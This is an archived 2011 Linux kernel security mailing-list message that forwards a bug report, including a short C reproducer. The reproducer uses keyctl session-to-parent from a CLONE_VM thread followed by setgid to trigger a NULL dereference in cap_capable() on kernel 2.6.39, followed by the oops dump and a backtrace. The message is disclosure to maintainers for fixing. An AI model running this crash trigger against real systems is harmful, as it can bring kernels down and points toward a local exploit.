[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <BANLkTikp4VweUE+JrkXRSJ-8kEEcPKpw8g@mail.gmail.com>
Date: Wed, 25 May 2011 09:28:34 +0100
From: Eugene Teo <eugeneteo@...nel.sg>
To: Robert Święcki <robert@...ecki.net>
Cc: linux-kernel@...r.kernel.org, security@...nel.org, kees@...ntu.com,
Tavis Ormandy <taviso@...xchg8b.com>,
David Howells <dhowells@...hat.com>
Subject: Re: [Security] Fwd: Oops (bad memory deref) in slab_alloc() due to
filp_cachep holding incorrect values
Cc'ed David as well.
On Tue, May 24, 2011 at 8:52 PM, Robert Święcki <robert@...ecki.net> wrote:
> And the repro - I think this might be exploitable (user-space NULL ptr
> deref at the first glance, in cap_capable() while in sys_setgid()).
> Works for me with 2.6.39 and the following config:
> http://alt.swiecki.net/linux_kernel/ise-test-2.6.39-kernel-config.txt
>
> It works for me with apparmor loaded, but looking at the code it
> should work with SELinux as well (both call cap_capable()). Could be
> some regression of http://securitytracker.com/id?1024384
>
> It works with 2.6.39 but not with 2.6.39-rc4. Found with Tavis
> Ormandy's http://code.google.com/p/iknowthis/
>
> #include <sys/stat.h>
> #include <sys/wait.h>
> #include <unistd.h>
> #include <sys/syscall.h>
> #include <linux/keyctl.h>
> #include <linux/sched.h>
>
> int TH1(void *dummy) {
> syscall(__NR_keyctl, KEYCTL_SESSION_TO_PARENT);
> syscall(__NR_exit, 0);
> }
>
> int main(int argc, char **argv)
> {
> char stack[1024 * 32];
> pid_t pid = clone(TH1, stack + sizeof(stack), CLONE_VM, NULL);
> if (pid == -1) {
> perror("clone");
> return -1;
> }
> int status;
> while(waitpid(pid, &status, __WALL) != pid);
> setgid(4286409707);
> return 0;
> }
>
> Oops (stacktraces from the previous emails are also valid). Basically
> 'struct user_namespace *targ_ns' in cap_capable() is NULL.
>
> [ 288.431402] CPU 0
> [ 288.431402] Pid: 875, comm: apparmor Not tainted 2.6.39 #1 Dell
> Inc. Precision WorkStation 390 /0GH911
> [ 288.431402] RIP: 0010:[<ffffffff8134cbdf>] [<ffffffff8134cbdf>]
> cap_capable+0x18/0x67
> [ 288.431402] RSP: 0018:ffff880120d43ec8 EFLAGS: 00010203
> [ 288.431402] RAX: ffff8801220ee0c0 RBX: 0000000000000001 RCX: 0000000000000006
> [ 288.431402] RDX: 0000000000000000 RSI: ffff880120ebb600 RDI: 0000000000000006
> [ 288.431402] RBP: ffff880120d43ec8 R08: 0000000000000001 R09: 000000000000005a
> [ 288.431402] R10: ffffffff813d42ea R11: 0000000000000246 R12: ffff880120ebb600
> [ 288.431402] R13: 0000000000000006 R14: ffff8801205aaee0 R15: 0000000000000000
> [ 288.431402] FS: 00007f919efc2720(0000) GS:ffff88012bc00000(0000)
> knlGS:0000000000000000
> [ 288.431402] CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b
> [ 288.431402] CR2: 0000000000000408 CR3: 00000001205de000 CR4: 00000000000006f0
> [ 288.431402] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
> [ 288.431402] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400
> [ 288.431402] Process apparmor (pid: 875, threadinfo
> ffff880120d42000, task ffff8801205aaee0)
> [ 288.431402] Stack:
> [ 288.431402] ffff880120d43f08 ffffffff81378bfb ffff880120d43ee8
> ffff8801205aaee0
> [ 288.431402] 00000000ff7d6beb ffff880120ebb600 0000000000000000
> 0000000000000000
> [ 288.431402] ffff880120d43f18 ffffffff8134d932 ffff880120d43f38
> ffffffff8109d99d
> [ 288.431402] Call Trace:
> [ 288.431402] [<ffffffff81378bfb>] apparmor_capable+0x27/0x61
> [ 288.431402] [<ffffffff8134d932>] security_capable+0x2a/0x2c
> [ 288.431402] [<ffffffff8109d99d>] ns_capable+0x3a/0x4f
> [ 288.431402] [<ffffffff8109da2b>] nsown_capable+0x24/0x29
> [ 288.431402] [<ffffffff810a6695>] sys_setgid+0x43/0x8d
> [ 288.431402] [<ffffffff81ed4902>] system_call_fastpath+0x16/0x1b
> [ 288.431402] Code: c1 fe 05 d3 e0 48 63 f6 23 44 b2 38 c9 83 f8 01
> 19 c0 c3 55 48 89 e5 0f 1f 44 00 00 89 cf 48 81 fa f0 16 a2 82 74 0d
> 48 8b 46 70
> [ 288.431402] 39 82 08 04 00 00 74 3d 48 8b 46 70 48 3b 50 60 75 1d 89 f9
> [ 288.431402] RIP [<ffffffff8134cbdf>] cap_capable+0x18/0x67
> [ 288.431402] RSP <ffff880120d43ec8>
> [ 288.431402] CR2: 0000000000000408
>
> (gdb) bt
> #0 0xffffffff8134cbdf in cap_capable (tsk=<value optimized out>,
> cred=0x0, targ_ns=0x0, cap=6, audit=1) at security/commoncap.c:88
> #1 0xffffffff81378bfb in apparmor_capable (task=0xffff880120e3aee0,
> cred=0xffff88011f540500, ns=<value optimized out>, cap=6, audit=1) at
> security/apparmor/lsm.c:144
> #2 0xffffffff8134d932 in security_capable (ns=<value optimized out>,
> cred=<value optimized out>, cap=<value optimized out>) at
> security/security.c:160
> #3 0xffffffff8109d99d in ns_capable (ns=<value optimized out>,
> cap=<value optimized out>) at kernel/capability.c:381
> #4 0xffffffff8109da2b in nsown_capable (cap=<value optimized out>) at
> kernel/capability.c:412
> #5 0xffffffff810a6695 in sys_setgid (gid=1540) at kernel/sys.c:570
> #6 0xffffffff810c1e11 in sys_setgid16 (gid=<value optimized out>) at
> kernel/uid16.c:53
>
> --
> Robert Święcki
>
> _______________________________________________
> Security mailing list
> Security@...ux.kernel.org
> http://linux.kernel.org/mailman/listinfo/security
>
--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majordomo@...r.kernel.org
More majordomo info at http://vger.kernel.org/majordomo-info.html
Please read the FAQ at http://www.tux.org/lkml/
Powered by blists - more mailing lists